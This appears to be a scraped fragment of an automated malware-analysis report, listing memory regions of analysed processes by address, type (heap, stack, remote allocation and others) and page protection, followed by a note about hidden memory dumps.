|
page read and write
|
||
|
22093959000
|
heap
|
page read and write
|
||
|
230CD2C000
|
stack
|
page read and write
|
||
|
148613AB000
|
heap
|
page read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092801000
|
heap
|
page read and write
|
||
|
180252000
|
unkown
|
page readonly
|
||
|
180335000
|
unkown
|
page readonly
|
||
|
180001000
|
unkown
|
page execute read
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092D44000
|
heap
|
page read and write
|
||
|
22095053000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
180327000
|
unkown
|
page read and write
|
||
|
14861390000
|
heap
|
page read and write
|
||
|
18982CE0000
|
heap
|
page read and write
|
||
|
1B929429000
|
heap
|
page read and write
|
||
|
1395000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
FFE49DE000
|
stack
|
page read and write
|
||
|
1B92946B000
|
heap
|
page read and write
|
||
|
1390000
|
heap
|
page read and write
|
||
|
14861360000
|
remote allocation
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
1F37B7E0000
|
heap
|
page read and write
|
||
|
24237116000
|
heap
|
page read and write
|
||
|
22092E21000
|
heap
|
page read and write
|
||
|
22094A5E000
|
heap
|
page read and write
|
||
|
1B9293D0000
|
remote allocation
|
page read and write
|
||
|
1B92943C000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
180326000
|
unkown
|
page write copy
|
||
|
1B92943A000
|
heap
|
page read and write
|
||
|
189830E5000
|
heap
|
page read and write
|
||
|
1898475E000
|
direct allocation
|
page readonly
|
||
|
220927DC000
|
heap
|
page read and write
|
||
|
148613EE000
|
heap
|
page read and write
|
||
|
1F37B840000
|
heap
|
page read and write
|
||
|
1486138D000
|
heap
|
page read and write
|
||
|
1B9292B0000
|
heap
|
page read and write
|
||
|
242373A0000
|
heap
|
page read and write
|
||
|
22AF1080000
|
heap
|
page read and write
|
||
|
220927D7000
|
heap
|
page read and write
|
||
|
22094FD3000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
189849C0000
|
heap
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
22092770000
|
trusted library allocation
|
page read and write
|
||
|
1B929390000
|
heap
|
page read and write
|
||
|
22092E31000
|
heap
|
page read and write
|
||
|
18982CD0000
|
heap
|
page read and write
|
||
|
14EA000
|
heap
|
page read and write
|
There are 370 hidden memdumps, click here to show them.